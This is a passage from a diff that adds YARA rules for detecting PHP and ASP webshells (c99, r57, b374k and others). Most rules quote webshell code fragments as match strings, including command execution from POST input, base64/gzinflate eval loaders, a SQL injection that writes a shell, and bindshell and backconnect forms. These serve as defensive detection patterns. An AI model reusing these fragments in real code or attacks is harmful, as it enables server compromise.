+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+	strings:
+		$s0 = "@ini_set(\"highlight" fullword
+		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
+		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
+	condition:
+		2 of them
+}
+rule _GFS_web_shell_ver_3_1_7___PRiV8_php_nshell_php_php_gfs_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "be0f67f3e995517d18859ed57b4b4389"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
+	strings:
+		$s2 = "echo $uname.\"</font><br><b>\";" fullword
+		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
+		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "c99ftpbrutecheck"
+		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
+		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword
+		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
+	condition:
+		2 of them
+}
+rule _w_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "$sqlquicklaunch[] = array(\""
+		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
+	condition:
+		all of them
+}
+rule _antichat_php_php_Fatalshell_php_php_a_gedit_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
+		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
+		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
+	strings:
+		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
+		$s1 = "if($action==\"phpeval\"){" fullword
+		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
+		$s3 = "$dir=getcwd().\"/\";" fullword
+	condition:
+		2 of them
+}
+rule _c99shell_v1_0_php_php_c99php_SsEs_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+	strings:
+		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
+	condition:
+		1 of them
+}
+rule _Crystal_php_nshell_php_php_load_shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "0c5d227f4aa76785e4760cdcff78a661"
+	strings:
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s1 = "$dires = $dires . $directory;" fullword
+		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
+	condition:
+		2 of them
+}
+rule _nst_php_php_cybershell_php_php_img_php_php_nstview_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "ef8828e0bc0641a655de3932199c0527"
+		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash3 = "4745d510fed4378e4b1730f56f25e569"
+	strings:
+		$s0 = "@$rto=$_POST['rto'];" fullword
+		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
+		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_dC3_Security_Crew_Shell_PRiV_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "433706fdc539238803fd47c4394b5109"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
+		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
+	condition:
+		all of them
+}
+rule _c99shell_v1_0_php_php_c99php_1_c2007_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash3 = "d089e7168373a0634e1ac18c0ee00085"
+		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
+	condition:
+		all of them
+}
+rule multiple_php_webshells_2 {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash6 = "09609851caa129e40b0d56e90dfc476c"
+		hash7 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
+		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
+		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "if ($total === FALSE) {$total = 0;}" fullword
+		$s1 = "$free_percent = round(100/($total/$free),2);" fullword
+		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
+		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
+	condition:
+		2 of them
+}
+rule _r577_php_php_r57_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
+		$s2 = "'eng_text30'=>'Cat file'," fullword
+		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
+	condition:
+		1 of them
+}
+rule _nixrem_php_php_c99shell_v1_0_php_php_c99php_NIX_REMOTE_WEB_SHELL_v_0_5_alpha_Lite_Public_Version_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
+		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash3 = "f3ca29b7999643507081caab926e2e74"
+	strings:
+		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
+		$s1 = "$ret = posix_kill($pid,$sig);" fullword
+		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
+		$s3 = "$i = $nixpasswd;" fullword
+	condition:
+		2 of them
+}
+
+/* GIF Header webshell */
+
+rule DarkSecurityTeam_Webshell {
+	meta:
+		description = "Dark Security Team Webshell"
+		author = "Florian Roth"
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		score = 50
+	strings:
+		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
+	condition:
+		1 of them
+}
+
+rule PHP_Cloaked_Webshell_SuperFetchExec {
+	meta:
+		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+		reference = "http://goo.gl/xFvioC"
+		author = "Florian Roth"
+		score = 50
+	strings:
+		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"
+	condition:
+		$s0
+}
+
+/* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */
+
+rule WebShell_RemExp_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
+		author = "Florian Roth"
+		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
+	strings:
+		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
+		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
+		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
+		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
+	condition:
+		all of them
+}
+rule WebShell_dC3_Security_Crew_Shell_PRiV {
+	meta:
+		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+		author = "Florian Roth"
+		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
+	strings:
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
+		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
+		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
+		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_simattacker {
+	meta:
+		description = "PHP Webshells Github Archive - file simattacker.php"
+		author = "Florian Roth"
+		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
+	strings:
+		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
+		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
+		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
+		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
+		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s20 = "$Comments=$_POST['Comments'];" fullword
+	condition:
+		2 of them
+}
+rule WebShell_DTool_Pro {
+	meta:
+		description = "PHP Webshells Github Archive - file DTool Pro.php"
+		author = "Florian Roth"
+		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
+	strings:
+		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
+		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
+		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
+		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
+		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
+		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
+		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
+		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
+	condition:
+		3 of them
+}
+rule WebShell_ironshell {
+	meta:
+		description = "PHP Webshells Github Archive - file ironshell.php"
+		author = "Florian Roth"
+		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
+	strings:
+		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
+		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
+		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
+		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
+		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword
+		$s16 = "if($_POST['chars'] == \"9999\")" fullword
+		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
+		$s18 = "print shell_exec($command);" fullword
+	condition:
+		3 of them
+}
+rule WebShell_indexer_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
+		author = "Florian Roth"
+		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
+	strings:
+		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
+		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
+		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
+		$s4 = "<form action=\"?oku\" method=\"post\">" fullword
+		$s7 = "var message=\"SaNaLTeRoR - " fullword
+		$s8 = "nDexEr - Reader\"" fullword
+	condition:
+		3 of them
+}
+rule WebShell_toolaspshell {
+	meta:
+		description = "PHP Webshells Github Archive - file toolaspshell.php"
+		author = "Florian Roth"
+		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
+	strings:
+		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
+		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
+		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
+	condition:
+		2 of them
+}
+rule WebShell_b374k_mini_shell_php_php {
+	meta:
+		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+		author = "Florian Roth"
+		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
+	strings:
+		$s0 = "@error_reporting(0);" fullword
+		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword
+		$s3 = "@set_time_limit(0); " fullword
+	condition:
+		all of them
+}
+rule WebShell_Sincap_1_0 {
+	meta:
+		description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+		author = "Florian Roth"
+		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
+	strings:
+		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
+		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
+		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
+		$s12 = "while (($ekinci=readdir ($sedat))){" fullword
+		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_b374k_php {
+	meta:
+		description = "PHP Webshells Github Archive - file b374k.php.php"
+		author = "Florian Roth"
+		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
+	strings:
+		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
+		$s6 = "// password (default is: b374k)"
+		$s8 = "//******************************************************************************"
+		$s9 = "// b374k 2.2" fullword
+		$s10 = "eval(\"?>\".gzinflate(base64_decode("
+	condition:
+		3 of them
+}
+rule WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend {
+	meta:
+		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		author = "Florian Roth"
+		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
+	strings:
+		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
+		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
+		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s19 = "$Comments=$_POST['Comments'];" fullword
+		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
+	condition:
+		3 of them
+}
+rule WebShell_h4ntu_shell__powered_by_tsoi_ {
+	meta:
+		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
+		author = "Florian Roth"
+		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
+	strings:
+		$s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
+		$s13 = "$cmd = $_POST['cmd'];" fullword
+		$s16 = "$uname = posix_uname( );" fullword
+		$s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
+		$s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
+		$s20 = "ob_end_clean();" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_MyShell {
+	meta:
+		description = "PHP Webshells Github Archive - file MyShell.php"
+		author = "Florian Roth"
+		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
+	strings:
+		$s3 = "<title>MyShell error - Access Denied</title>" fullword
+		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
+		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword
+		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
+		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
+		$s19 = "#every command you excecute." fullword
+		$s20 = "<form name=\"shell\" method=\"post\">" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_pws {
+	meta:
+		description = "PHP Webshells Github Archive - file pws.php"
+		author = "Florian Roth"
+		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
+	strings:
+		$s6 = "if ($_POST['cmd']){" fullword
+		$s7 = "$cmd = $_POST['cmd'];" fullword
+		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
+		$s11 = "if (file_exists($uploaded)) {" fullword
+		$s12 = "copy($uploaded, $dez);" fullword
+		$s17 = "passthru($cmd);" fullword
+	condition:
+		4 of them
+}
+rule WebShell_reader_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file reader.asp.php.txt"
+		author = "Florian Roth"
+		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
+	strings:
+		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
+		$s12 = " HACKING " fullword
+		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
+		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
+	condition:
+		3 of them
+}
+rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
+		author = "Florian Roth"
+		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
+	strings:
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
+		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
+		$s15 = "if(empty($_GET['file'])){" fullword
+		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
+	condition:
+		3 of them
+}
+rule WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
+	meta:
+		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		author = "Florian Roth"
+		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
+	strings:
+		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
+		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword
+		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
+		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
+		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file php-backdoor.php"
+		author = "Florian Roth"
+		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
+	strings:
+		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
+		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
+		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
+		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
+		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+	condition:
+		1 of them
+}
+rule WebShell_Worse_Linux_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
+		author = "Florian Roth"
+		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
+	strings:
+		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
+		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
+		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
+		$s8 = "$currentCMD = \"ls -la\";" fullword
+		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
+		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_pHpINJ {
+	meta:
+		description = "PHP Webshells Github Archive - file pHpINJ.php"
+		author = "Florian Roth"
+		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
+	strings:
+		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
+		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
+		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
+		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
+		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
+		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
+		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_NGH {
+	meta:
+		description = "PHP Webshells Github Archive - file NGH.php"
+		author = "Florian Roth"
+		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
+	strings:
+		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
+		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
+		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
+		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
+		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
+		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
+		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_matamu {
+	meta:
+		description = "PHP Webshells Github Archive - file matamu.php"
+		author = "Florian Roth"
+		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
+	strings:
+		$s2 = "$command .= ' -F';" fullword
+		$s3 = "/* We try and match a cd command. */" fullword
+		$s4 = "directory... Trust me - it works :-) */" fullword
+		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
+		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
+		$s16 = "/* The last / in work_dir were the first charecter." fullword
+	condition:
+		2 of them
+}
+rule WebShell_ru24_post_sh {
+	meta:
+		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
+		author = "Florian Roth"
+		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
+	strings:
+		$s1 = "http://www.ru24-team.net" fullword
+		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s6 = "Ru24PostWebShell"
+		$s7 = "Writed by DreAmeRz" fullword
+		$s9 = "$function=passthru; // system, exec, cmd" fullword
+	condition:
+		1 of them
+}
+rule WebShell_hiddens_shell_v1 {
+	meta:
+		description = "PHP Webshells Github Archive - file hiddens shell v1.php"
+		author = "Florian Roth"
+		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
+	strings:
+		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+	condition:
+		all of them
+}
+rule WebShell_c99_madnet {
+	meta:
